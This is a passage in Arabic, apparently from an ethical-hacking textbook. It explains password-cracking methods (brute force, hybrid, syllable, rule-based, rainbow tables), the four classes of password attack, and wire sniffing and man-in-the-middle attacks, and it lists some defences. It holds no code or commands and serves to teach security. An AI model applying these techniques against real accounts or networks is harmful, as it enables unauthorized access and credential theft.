‫ﺗﺣﻠﯾل اﻟﺷﻔرات ھو ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ﻋﻠﻰ اﻟﺗﺷﻔﯾر ﻟﺑﺣث اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ﻋﻠﻰ‪ . keyspace‬وﺑﻌﺑﺎرة أﺧرى ھو اﺧﺗﺑﺎر ﺟﻣﯾﻊ اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ‬
‫ﻟدﯾﻧﺎ ﻓﻲ ﻣﺣﺎوﻟﺔ ﻻﺳﺗرداد اﻟﻧص اﻟﻌﺎدي اﻟذي اﺳﺗﺧدم ﻹﻧﺗﺎج اﻟﻧص اﻟﻣﺷﻔر‪ .‬اﻛﺗﺷف اﻟﻣﻔﺗﺎح أو اﻟﻧص اﻟﻌﺎدي ﻣﻊ وﺗﯾرة أﺳرع ﺑﺎﻟﻣﻘﺎرﻧﺔ ﻣﻊ‬
‫ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ﯾﻣﻛن اﻋﺗﺑﺎر وﺳﯾﻠﺔ ﻟﻛﺳر اﻟﻧص اﻟﻣﺷﻔر]‪ .[cipher‬اﻟﻧص اﻟﻣﺷﻔر]‪ [cipher‬ھو اﻣن ﻓﻲ ﺣﺎﻟﺔ ﻋدم وﺟود أي طرﯾﻘﺔ‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪323‬‬

‫ﻟﻛﺳر ھذا اﻟﺗﺷﻔﯾر ﻏﯾر ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ‪ .‬ﻓﻲ اﻟﻐﺎﻟب‪ ،‬ﻛل اﻟﻧﺻوص اﻟﻣﺷﻔر )‪ (ciphers‬ﻗﺎﺻره ﻋﻠﻰ اﻣن اﻟﻌﻣﻠﯾﺔ اﻟرﯾﺎﺿﯾﺔ اﻟﻣﺳﺗﺧدم ﻓﻲ‬
‫ﻋﻣﻠﯾﺔ اﻟﺗﺷﻔﯾر‪.‬‬
‫إذا ﺗم اﺧﺗﯾﺎر ﻣﻔﺎﺗﯾﺢ أﺻﻠﻰ ﺑطرﯾﻘﮫ ﻋﺷواﺋﯾﺔ أو اﻟﺑﺣث ﻋﻧﮫ ﺑﺷﻛل ﻋﺷواﺋﻲ‪ ،‬ﻓﺎن اﻟﻧص اﻟﻌﺎدي‪ ،‬ﻓﻲ اﻟﻣﺗوﺳط‪ ،‬ﺳوف ﯾﺻﺑﺢ ﻣﺗﺎح ﺑﻌد اﺳﺗﺧدام‬
‫ﻧﺻف ﺟﻣﯾﻊ ﻣﻔﺎﺗﯾﺢ اﻟﻣﻣﻛﻧﺔ‪.‬‬

‫ﺑﻌض اﻻﻋﺗﺑﺎرات اﻟﺗﻲ ﯾﺟب ان ﺗﻌرﻓﮭﺎ ﺣول ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ھﻲ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪ -‬اﻟﻌﻣﻠﯾﺔ ﺗﺳﺗﻐرق وﻗﺗﺎ طوﯾﻼ‪.‬‬
‫‪ -‬ﻓﻲ ﻧﮭﺎﯾﺔ اﻟﻣطﺎف ﯾﻣﻛن اﻟﻌﺛور ﻋﻠﻰ ﺟﻣﯾﻊ ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫‪ -‬اﻟﮭﺟﻣﺎت ﺿد ‪ NT hashes‬ھﻲ أﺻﻌب ﺑﻛﺛﯾر ﻣن ‪.LM hashes‬‬

‫اﻟﮭﺟوم اﻟﮭﺟﯾن ‪HYBRID ATTACK‬‬

‫ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﻌﺗﻣد ﻋﻠﻰ ھﺟوم اﻟﻘﺎﻣوس )‪ .(Dictionary attack‬ھﻧﺎك اﺣﺗﻣﺎﻻت ﺑﺄن اﻟﻧﺎس ﻗد ﺗﻐﯾﯾر ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم‬
‫ﻓﻘط ﻋن طرﯾﻖ إﺿﺎﻓﺔ ﺑﻌض اﻷرﻗﺎم ﻟﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم اﻟﻘدﯾﻣﺔ‪ .‬ﻓﻲ ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم‪ ،‬ﯾﺿﯾف اﻟﺑرﻧﺎﻣﺞ ﺑﻌض اﻷرﻗﺎم واﻟرﻣوز‬
‫إﻟﻰ ﻛﻠﻣﺎت ﻣن ‪ Dictionary‬وﯾﺣﺎول ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬إذا ﻛﺎﻧت ﻛﻠﻣﺔ اﻟﻣرور اﻟﻘدﯾﻣﺔ ھﻲ "‪ ،"system‬ﻓﺎن ھﻧﺎك ﻓرﺻﺔ‬
‫أن اﻟﺷﺧص ﯾﻐﯾره إﻟﻰ "‪ "system1‬أو "‪."system2‬‬

‫‪SYLLABLE ATTACK‬‬

‫‪ Syllable attack‬ھو ﻣزﯾﺞ ﻣن ﻛل ﻣن ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ )‪ (brute force attack‬وھﺟوم اﻟﻘﺎﻣوس)‪. (dictionary attack‬‬
‫ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب ﻋﻧدﻣﺎ ﺗﻛون ﻛﻠﻣﺔ اﻟﻣرور ﻛﻠﻣﮫ ﻟﯾﺳت ﻣوﺟودة‪ .‬اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣوا ‪ dictionary‬وﻏﯾرھﺎ ﻣن اﻟطرق ﻟﻠﻘﺿﺎء ﻋﻠﯾﮫ‪.‬‬
‫ﯾﺳﺗﺧدم أﯾﺿﺎ ﻓﻲ اﻟﺗرﻛﯾﺑﺎت اﻟﻣﻣﻛﻧﺔ ﻟﻛل اﻟﻛﻠﻣﺎت اﻟﻣوﺟودة ﻓﻲ ‪.dictionary‬‬

‫ھﺟوم ﻣﺳﺗﻧد إﻟﻰ ﻗواﻋد ‪RULE-BASED ATTACK‬‬


‫ﯾﺳﺗﺧدم ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﻋﻧدﻣﺎ ﯾﺣﺻل اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﺑﻌض اﻟﻣﻌﻠوﻣﺎت ﺣول ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ھذا ھو اﻟﮭﺟوم اﻷﻗوى ﻷن اﻟﻣﮭﺎﺟم ﯾﻌرف‬
‫ﻧوع ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬إذا ﻛﺎن اﻟﻣﮭﺎﺟم ﯾﻌرف أن ﻛﻠﻣﺔ ﺗﺣﺗوي ﻋﻠﻰ ﻋدد أرﻗﺎم ﺛﻼﺛﺔ أو اﺛﻧﯾن‪ ،‬ﻓﺎﻧﮫ ﺳوف ﯾﺳﺗﺧدم ﺑﻌض‬
‫اﻟﺗﻘﻧﯾﺎت اﻟﻣﺣددة ﻻﺳﺗﺧراج اﻟﻛﻠﻣﺔ ﻓﻲ وﻗت أﻗل‪.‬‬
‫ﻣن ﺧﻼل اﻟﺣﺻول ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﻣﻔﯾدة ﻣﺛل اﺳﺗﺧدام اﻷرﻗﺎم‪ ،‬طول ﻛﻠﻣﺔ اﻟﺳر‪ ،‬اﻟرﻣوز اﻟﺧﺎﺻﺔ‪ ،‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺑﺳﮭوﻟﺔ ﺿﺑط اﻟوﻗت‬
‫ﻻﺳﺗرﺟﺎع ﻛﻠﻣﺔ اﻟﻣرور إﻟﻰ اﻟﺣد اﻷدﻧﻰ وﺗﺣﺳﯾن أداة اﻟﻛﺳر ﻻﺳﺗرداد ﻛﻠﻣﺎت اﻟﺳر‪ .‬ھذا اﻷﺳﻠوب ﯾﺷﻣل ھﺟﻣﺎت ‪،brute force‬‬
‫‪ ،dictionary‬و‪.syllable‬‬

‫‪TYPES OF PASSWORD ATTACKS‬‬

‫ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور )‪ (Password Cracking‬ھﻲ واﺣدة ﻣن اﻟﻣراﺣل اﻟﺣﺎﺳﻣﺔ ﻣن ﻗرﺻﻧﺔ اﻟﻧظﺎم‪ .‬ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ﺗﺳﺗﺧدم ﻷﻏراض‬
‫ﻗﺎﻧوﻧﯾﺔ ﻓﻲ اﺳﺗرداد ﻛﻠﻣﺔ اﻟﺳر اﻟﻣﻔﻘودة ﻟﻠﻣﺳﺗﺧدم؛ إذا ﺗم اﺳﺗﺧداﻣﮫ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدﻣﯾن ﺑطرﯾﻘﮫ ﻏﯾر ﺷرﻋﯾﺔ‪ ،‬ﻓﺈﻧﮫ ﯾﻣﻛن أن ﯾﺳﺑب ﻟﮭم‬
‫ﻟﻠﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎز ﻏﯾر ﻣﺻرح ﺑﮭﺎ ﻋﻠﻰ اﻟﺷﺑﻛﺔ أو اﻟﻧظﺎم‪ .‬ﺗﺻﻧف ھﺟﻣﺎت ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﺑﻧﺎء ﻋﻠﻰ إﺟراءات اﻟﻣﮭﺎﺟم ﻓﻲ ﻛﺳر ﻛﻠﻣﺔ‬
‫اﻟﻣرور‪ .‬ﻋﺎدة ﻣﺎ ﺗﻛون ھﻧﺎك أرﺑﻌﺔ أﻧواع وھم‪:‬‬

‫‪Passive Online Attacks -1‬‬


‫ھو ھﺟوم ﻋﻠﻰ ﻧظﺎم ﻻ ﯾؤدي إﻟﻰ ﺗﻐﯾﯾر اﻟﻧظﺎم ﺑﺄي ﺷﻛل ﻣن اﻷﺷﻛﺎل‪ .‬اﻟﮭﺟوم ھو ﻋﺑﺎره ﻋن ﻋﻣﻠﯾﺔ ﻟرﺻد أو ﺗﺳﺟﯾل اﻟﺑﯾﺎﻧﺎت‪Passive .‬‬
‫‪ attack‬ﻋﻠﻰ ﺗﺷﻔﯾر ھﻲ واﺣدة ﯾﻛون ﻓﯾﮭﺎ ﺗﺣﻠﯾل اﻟﺷﻔر ﻻ ﯾﻣﻛن أن ﯾﺗﻔﺎﻋل ﻣﻊ أي ﻣن اﻷطراف اﻟﻣﻌﻧﯾﺔ‪ ،‬ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﻛﺳر اﻟﻧظﺎم ﯾﻌﺗﻣد ﻓﻘط‬
‫ﻋﻠﻰ اﻟﺑﯾﺎﻧﺎت اﻟﻣرﺻودة‪ .‬ھﻧﺎك ﺛﻼث أﻧواع ﻣن اﻟﮭﺟﻣﺎت اﻟﺳﻠﺑﯾﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت‪ .‬وھم‪:‬‬
‫‪Wire sniffing -‬‬
‫‪Man-in-the-middle -‬‬
‫‪Replay -‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪324‬‬

‫‪Active online attack -2‬‬


‫اﻟﮭﺟوم ﻋﻠﻰ اﻻﻧﺗرﻧت اﻟﻧﺷط )‪ (Active online attack‬ھو أﺳﮭل طرﯾﻘﺔ ﻟﻛﺳب اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ ﻋﻠﻰ ﻣﺳﺗوى اﻟﻣﺳؤول إﻟﻰ‬
‫اﻟﻧظﺎم‪ .‬ھﻧﺎك ﺛﻼﺛﺔ أﻧواع ﻣن اﻟﮭﺟﻣﺎت اﻟﻧﺷطﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت‪ .‬وھم‪:‬‬
‫‪Password guessing -‬‬
‫‪Trojan/spyware/key logger -‬‬
‫‪Hash injection -‬‬
‫‪Phishing -‬‬
‫‪Offline Attacks -3‬‬
‫ﺗﺣدث ھﺟﻣﺎت ‪ Offline attacks‬ﻋﻧدﻣﺎ ﯾﺗﺣﻘﻖ اﻟدﺧﯾل ﻣن ﺻﺣﺔ ﻛﻠﻣﺎت اﻟﻣرور‪ .‬ﺣﯾث اﻧﮫ ﯾﻼﺣظ ﻛﯾﻔﯾﺔ ﺗﺧزﯾن ﻛﻠﻣﺔ اﻟﻣرور ﻓﻲ اﻟﻧظﺎم‬
‫اﻟﻣﺳﺗﮭدف‪ .‬إذا ﺗم ﺗﺧزﯾن أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻣﻠف ﻗﺎﺑل ﻟﻠﻘراءة‪ ،‬ﯾﺻﺑﺢ ﻣن اﻟﺳﮭل ﻋﻠﻰ اﻟدﺧﯾل اﻟوﺻول إﻟﻰ اﻟﻧظﺎم‪ .‬ﻣن‬
‫أﺟل ﺣﻣﺎﯾﺔ ﻗﺎﺋﻣﺔ ﻛﻠﻣﺎت اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك ﯾﻧﺑﻐﻲ داﺋﻣﺎ أن ﺗﺑﻘﻰ ﻓﻲ ﺷﻛل ﻏﯾر ﻗﺎﺑل ﻟﻠﻘراءة‪ ،‬وھو ﻣﺎ ﯾﻌﻧﻲ أﻧﮭﺎ ﯾﺟب أن ﺗﻛون ﻣﺷﻔرة‪ .‬ھﺟﻣﺎت‬
‫‪ Offline attacks‬ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﻛون ﻣﺿﯾﻌﺔ ﻟﻠوﻗت‪ .‬ﻛﺎﻧت ﻣن ﻗﺑل ﻧﺎﺟﺣﺔ ﺑﺳب ﺿﻌف ‪ LM hash‬وذﻟك ﻻن ﺣﺟﻣﮫ ‪ keyspace‬ﻛﺎن أﺻﻐر‬
‫ﺣﺟﻣﺎ وأﻗﺻر طوﻻ‪ .‬وﺗﺗوﻓر ﺗﻘﻧﯾﺎت ﻣﺧﺗﻠﻔﺔ ﻟﻛﺳﯾر ﻛﻠﻣﺔ ﻣرور ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﻧﺗرﻧت‪ .‬ﺗﻘﻧﯾﺎت ﻟﻣﻧﻊ أو اﻟﺣﻣﺎﯾﺔ ﻣن ھﺟﻣﺎت ‪Offline attacks‬‬
‫ھﻲ‪:‬‬
‫‪Use good passwords -‬‬
‫‪Remove LM hashes -‬‬
‫‪Attacker has the password database -‬‬
‫‪Use cryptographically secure methods while representing the passwords -‬‬
‫ھﻧﺎك ﺛﻼﺛﺔ أﻧواع ﻣن ھﺟﻣﺎت ‪ .Offline attacks‬وھم‪:‬‬
‫‪Pre-computed hashes -‬‬
‫‪Distributed network -‬‬
‫‪Rainbow -‬‬
‫‪Non-electronic Attacks -4‬‬
‫‪ Non-electronic attacks‬اﻟﮭﺟﻣﺎت اﻟﻐﯾر إﻟﻛﺗروﻧﯾﺔ ﺗﻌرف أﯾﺿﺎ ﺑﺎﺳم ھﺟﻣﺎت ﻏﯾر اﻟﺗﻘﻧﯾﺔ)‪ . (non-technical attacks‬ھذا اﻟﻧوع‬
‫ﻣن اﻟﮭﺟﻣﺎت ﻻ ﯾﺗطﻠب أي ﻣﻌرﻓﺔ ﺗﻘﻧﯾﺔ ﺣول طرق اﻟﺗدﺧل ﻓﻲ ﻧظﺎم آﺧر‪ .‬ﻟذا‪ ،‬ﯾطﻠﻖ ﻋﻠﯾﮫ ھﺟوم ﻏﯾر إﻟﻛﺗروﻧﯾﺔ‪ .‬ھﻧﺎك ﺛﻼﺛﺔ أﻧواع ﻣن‬
‫اﻟﮭﺟﻣﺎت ﻏﯾر اﻹﻟﻛﺗروﻧﯾﺔ‪ .‬وھم‪:‬‬
‫‪Shoulder surfing -‬‬
‫‪Social engineering -‬‬
‫‪Dumpster diving -‬‬

‫‪Passive Online Attack: Wire Sniffing‬‬


‫ﻧﺎدرا ﻣﺎ ﯾﺗم اﺳﺗﺧدام أدوات اﻟﺗﺟﺳس )‪ (packet sniffer tool‬ﻓﻲ اﻟﮭﺟوم‪ .‬وذﻟك ﻷن ‪ sniffer‬ﯾﻣﻛن أن ﯾﻌﻣل ﻓﻘط ﻓﻲ ﻧطﺎق اﻟﺗﺻﺎدم‬
‫)‪ (collision domain‬اﻟﻣﺷﺗرﻛﺔ‪ .‬ﻻ ﯾﺗم رﺑط ﻣﺟﺎﻻت اﻟﺗﺻﺎدم )‪ (collision domain‬اﻟﻣﺷﺗرﻛﺔ ﻣن ﻗﺑل ‪ switch‬أو ‪ .bridge‬أﯾﺿﺎ‬
‫ﺟﻣﯾﻊ اﻟﻣﺿﯾﻔﯾن ﻋﻠﻰ ﺗﻠك اﻟﺷﺑﻛﺔ ﻻ ﯾﺗم ﺗﺣوﯾﻠﮭم )‪ (switched‬أو ‪ bridged‬ﻓﻲ ﻗطﺎع اﻟﺷﺑﻛﺔ‪.‬‬

‫‪:Collision domain‬‬
‫ﻧطﺎق اﻟﺗﺻﺎدم ھﻲ اﻟﺗﺻﺎدﻣﺎت اﻟﺗﻲ ﺗﺣدث ﺑﯾن ﺣزم اﻟﺑﯾﺎﻧﺎت ﻓﻲ اﻟﺷﺑﻛﺎت اﻟﻣﺣﻠﯾﺔ ﻣن ﻧوع إﯾﺛرﻧت‪ .‬ﯾﺣدث اﻟﺗﺻﺎدم ﻋﻧد ﻗﯾﺎم أﻛﺛر ﻣن ﺟﮭﺎز‬
‫ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ﺑﺈرﺳﺎل ﺣزم ﺑﯾﺎﻧﺎت ﻓﻲ ﻧﻔس اﻟوﻗت ﻣﻣﺎ ﯾﻧﺗﺞ ﻋﻧﮫ ﻓﻘدان ﺗﻠك اﻟﺣزم او ﺣدوث اﺧﺗﻧﺎق ﻓﻲ اﻟﺷﺑﻛﺔ‪.‬‬
‫ﯾﻧﺗﺞ اﻻﺧﺗﻧﺎق ﺟراء اﺳﺗﺧدام ھﺎب )‪ (HUB‬او اﻟ ُﻣﻛرر ﻓﻲ ﺑﻧﯾﺔ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ‪ .lan‬وﯾﻣﻛن ﺣل اﻟﻣﺷﻛﻠﺔ ﺑﺎﺳﺗﺧدام اﻟﻣوزع)‪،(switched‬‬
‫اﻟﺟﺳر)‪ (bridged‬واﻟﻣوﺟﮫ )‪(router‬ﺣﯾث اﻧﮭﺎ ﺗﻘوم ﺑﺗﻘﺳﯾم ﻣﺟﺎل اﻟﺗﺻﺎدم ﻣﻣﺎ ﯾﻘﻠل ﻣن ﺣدوﺛﮫ ﻣﻊ ﻣﻼﺣظﺔ ان اﻟﻣوﺟﮫ )‪(router‬ﯾﻘوم‬
‫ﺑﺗﻘﺳﯾم ﻣﺟﺎل اﻟﺑث )‪ (broadcast domain‬اﯾﺿﺎ‪ .‬ﯾﻣﻛن ﺣل ﻣﺷﺎﻛل اﻻﺧﺗﻧﺎق ﺑﺎﺳﺗﺧدام ﺧوارزﻣﯾﺔ ﺗﺣﺳس اﻟﻧﺎﻗل ﻣﺗﻌدد اﻟوﺻول ﻣﻊ‬
‫ﺗﺣﺳس اﻟﺗﺻﺎدم‪(Carrier Sense Multiple Access With Collision detection CSMA/CD).‬‬
‫ﺗﺣﺳس اﻟﻧﺎﻗل ﻣﺗﻌدد اﻟوﺻول ﻣﻊ ﺗﺣﺳس اﻟﺗﺻﺎدم ﻗﺑل ﻗﯾﺎم اي ﺟﮭﺎز ﺑﺎرﺳﺎل اﻟﺑﯾﺎﻧﺎت‪ ،‬ﯾﺟب ان ﯾﻘوم ﺑﺗﺣﺳس اﻟﻧﺎﻗل واﻟﺗﺄﻛد ﻣن ﻋدم وﺟود‬
‫ﺑﯾﺎﻧﺎت ﻋﻠﻰ ذﻟك اﻟﻧﺎﻗل‪ ،‬ﻋﻧدھﺎ ﯾﻘوم ﺑﺈرﺳﺎل اﻟﺑﯾﺎﻧﺎت اﻟﻰ وﺟﮭﺗﮭﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪325‬‬

‫‪:Broadcast domain‬‬
‫ﻣﺟﺎل اﻟﺑث وھﻲ ﻣﺟﻣوﻋﺔ ﻣن اﻻﺟﮭزة اﻟﻣرﺑوطﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ‪ ،Lan‬ﺑﺣﯾث ﯾﻣﻛن ﻷي ﻋﻘدة اﻟﺑث ﻟﻠﻣﺟﻣوﻋﺔ ﻋن طرﯾﻖ طﺑﻘﺔ رﺑط‬
‫اﻟﺑﯾﺎﻧﺎت ﻣن ﻣرﺟﻊ أو إس آي‪ .‬ﯾﻣﻛن ﻟﻧظﺎم اﻟﺑث ان ﯾﻛون ﻋﻠﻰ ﻧﻔس ﻣﻘطﻊ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ‪ Lan‬او ان ﯾوﺻل ﻟﻣﻘﺎطﻊ اﺧرى ﻣن اﻟﺷﺑﻛﺔ‬
‫ﺑﺎﺳﺗﺧدام ادوات رﺑط اﻟﺷﺑﻛﺔ‪.‬‬
‫ﻣﻌﻠوﻣﺔ ھﺎﻣﺔ ﺟدا ﺟدا ﺟدا‬
‫اﻟراوﺗر‪ :‬ﻛل اﻧﺗر ﻓﯾس ﻣن اﻟراوﺗر ﯾﻌﺗﺑر ‪ broadcast‬وﻓﻲ ﻧﻔس اﻟوﻗت ﻛل اﻧﺗر ﻓﯾس ﯾﻌﺗﺑر‪Collision domain‬‬
‫اﻟﺳوﯾﺗش‪ :‬ﻛﻠﮫ ﻋﻠﻰ ﺑﻌﺿﮫ ﯾﻌﺗﺑر ‪ broadcast‬وﻛل اﻧﺗر ﻓﯾس ﯾﻌﺗﺑر‪. Collision domain‬‬
‫‪ :Hub‬ﻛﻠﮫ ﻋﻠﻰ ﺑﻌﺿﮫ ﯾﻌﺗﺑر ‪.Collision domain‬‬

‫ﻛﻣﺎ ﯾﻘوم ‪ packet sniffer tool‬ﺑﺟﻣﻊ اﻟﺣزم ﻓﻲ طﺑﻘﺔ رﺑط اﻟﺑﯾﺎﻧﺎت‪ ، Data Link Layer‬ﻓﺈﻧﮫ ﯾﻣﻛن أﯾﺿﺎ اﻻﺳﺗﯾﻼء ﻋﻠﻰ ﻛﺎﻓﺔ اﻟﺣزم‬
‫ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ )‪ (LAN‬ﻣن اﻟﺟﮭﺎز اﻟذي ﯾﻘوم ﺑﺗﺷﻐﯾل ﺑرﻧﺎﻣﺞ ‪ .Sniffer‬ھذا اﻷﺳﻠوب ﻣن اﻟﺻﻌب ﻧﺳﺑﯾﺎ ﺗﻧﻔﯾذه وﻣﻌﻘد ﺣﺳﺎﺑﯾﺎ‪ .‬وذﻟك‬
‫ﻷن اﻟﺷﺑﻛﺔ ﻣﻊ ‪ HUB‬ﺗﻧﻔذ ‪ broadcast medium‬اﻟﺗﻲ ﯾﺷﺗرك ﻓﯾﮭﺎ ﺟﻣﯾﻊ اﻷﻧظﻣﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ‪ .‬ﺣﯾث أي ﺑﯾﺎﻧﺎت ﯾﺗم إرﺳﺎﻟﮭﺎ ﻋﺑر‬
‫اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ اﻟﻰ ﺟﮭﺎز ﻣﻌﯾن ﻓﮭﯾﺎ ﻓﻲ اﻟواﻗﻊ ﯾﺗم ارﺳﺎﻟﮭﺎ إﻟﻰ ﻛل اﻷﺟﮭزة اﻟﻣﺗﺻﻠﺔ ﺑﺎﻟﺷﺑﻛﺔ اﻟداﺧﻠﯾﺔ ‪ .LAN‬ﻓﺈذا ﻗﺎم اﻟﻣﮭﺎﺟم ﺑﺗﺷﻐﯾل‬
‫‪ Sniffers‬ﻋﻠﻰ أي ﻧظﺎم ﻣوﺟود ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟداﺧﻠﯾﺔ )‪(LAN‬ﻓﺎﻧﮫ ﯾﻣﻛن ﺟﻣﻊ أي ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﻣرﺳﻠﺔ ﻣن وإﻟﻰ أي ﻧظﺎم آﺧر ﻋﻠﻰ اﻟﺷﺑﻛﺔ‬
‫اﻟﻣﺣﻠﯾﺔ‪ .‬ﻏﺎﻟﺑﯾﺔ أدوات اﻟﺗﺟﺳس )‪ (Sniffers‬ھﻲ ﻣﻧﺎﺳﺑﺔ ﻟﺟﻣﻊ اﻟﺑﯾﺎﻧﺎت ﻓﻲ ﺑﯾﺋﺔ ‪ .hub‬وﺗﺳﻣﻰ ھذه اﻷدوات ‪ passive sniffers‬ﻷﻧﮭﺎ‬
‫ﺗﻧﺗظر ﺳﻠﺑﯾﺎ )أي ﻻ ﺗﺗﻔﺎﻋل ﻣﻊ أي ﻣن اﻷﺟﮭزة ﻋﻠﻰ اﻟﺷﺑﻛﺔ( اﻟﺑﯾﺎﻧﺎت ﻹرﺳﺎﻟﮭﺎ‪ ،‬ﻗﺑل اﻟﺗﻘﺎط اﻟﻣﻌﻠوﻣﺎت‪ .‬ﻓﮭﻲ ﻓﻌﺎﻟﺔ ﻓﻲ ﺟﻣﻊ اﻟﺑﯾﺎﻧﺎت ﺑﺻورة‬
‫ﺗدرﯾﺟﯾﺔ ﻣن ‪ .LAN‬وﯾﻣﻛن أن ﺗﺷﻣل اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﺗم اﻟﺗﻘﺎطﮭﺎ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣرﺳﻠﺔ إﻟﻰ اﻷﻧظﻣﺔ اﻟﺑﻌﯾدة ﺧﻼل ‪ Telnet‬و‪ ،FTP‬وﺟﻠﺳﺎت‬
‫ﻏﯾر أﻣﻧﮫ‪ ،‬واﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣرﺳﻠﺔ واﻟﻣﺳﺗﻠﻣﺔ‪ .‬ﯾﺗم اﺳﺗﺧدام اﻟﺑﯾﺎﻧﺎت ﻟﻠوﺻول ﻏﯾر اﻟﻣﺻرح ﺑﮫ إﻟﻰ اﻟﻧظﺎم اﻟﮭدف‪ .‬وھﻧﺎك ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ‬
‫ﻣن اﻷدوات اﻟﻣﺗﺎﺣﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﻧﺗرﻧت ل ‪.passive wire sniffing‬‬

‫‪Passive Online Attack: Man-in-the-Middle and Replay Attack‬‬


‫ﻋﻧدﻣﺎ ﯾﺗم اﻟﺗواﺻل ﺑﯾن طرﻓﯾن‪ ،‬ﻓﺎن ھﺟوم رﺟل ﻓﻲ اﻟوﺳط )‪ (man-in-middle‬ﻣن اﻟﻣﻣﻛن ان ﯾﺄﺧذ ﻣﻛﺎﻧﺎ‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﻓﺎن ﯾوﺟد‬
‫طرف ﺛﺎﻟث ﯾﻌﺗرض اﻻﺗﺻﺎﻻت ﺑﯾن اﻟطرﻓﯾن‪ ،‬وﯾﺗﺄﻛد ﻣن ان اﻟﺗواﺻل ﺑﯾن اﻟطرﻓﯾن ﯾﺗم ﻣﻊ ﺑﻌﺿﮭم اﻟﺑﻌض‪ .‬ﻓﻲ اﻟوﻗت ﻧﻔﺳﮫ‪ ،‬ﻓﺎن اﻟطرف‬
‫اﻟﺛﺎﻟث ﯾﻣﻛﻧﮫ ﺗﻐﯾر اﻟﺑﯾﺎﻧﺎت أو اﻟﺗﻧﺻت وﯾﻣرر اﻟﺑﯾﺎﻧﺎت ﻋﻠﻰ طول اﻻﺗﺻﺎل‪.‬‬
‫ﻟﻠﻘﯾﺎم ﺑﮭذا‪ ،‬ﻓﺎﻧﮫ ﯾﺟب ﻋﻠﻰ اﻟرﺟل ﻓﻲ اﻟﻣﻧﺗﺻف )‪ (man-in-middle‬اﻟﺗﻧﺻت )‪(sniff‬ﻋﻠﻰ ﻛﻼ اﻟﺟﺎﻧﺑﯾن ﻣن اﻻﺗﺻﺎل ﻓﻲ ﻧﻔس اﻟوﻗت‪.‬‬
‫ﻛﺛﯾرا ﻣﺎ وﺟدت ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﻓﻲ ‪ telnet‬واﻟﺗﻘﻧﯾﺎت اﻟﻼﺳﻠﻛﯾﺔ‪ .‬ﻓﺈﻧﮫ ﻟﯾس ﻣن اﻟﺳﮭل ﺗﻧﻔﯾذ ﻣﺛل ھذه اﻟﮭﺟﻣﺎت ﻧظرا ﻷرﻗﺎم ﺗﺳﻠﺳل‬
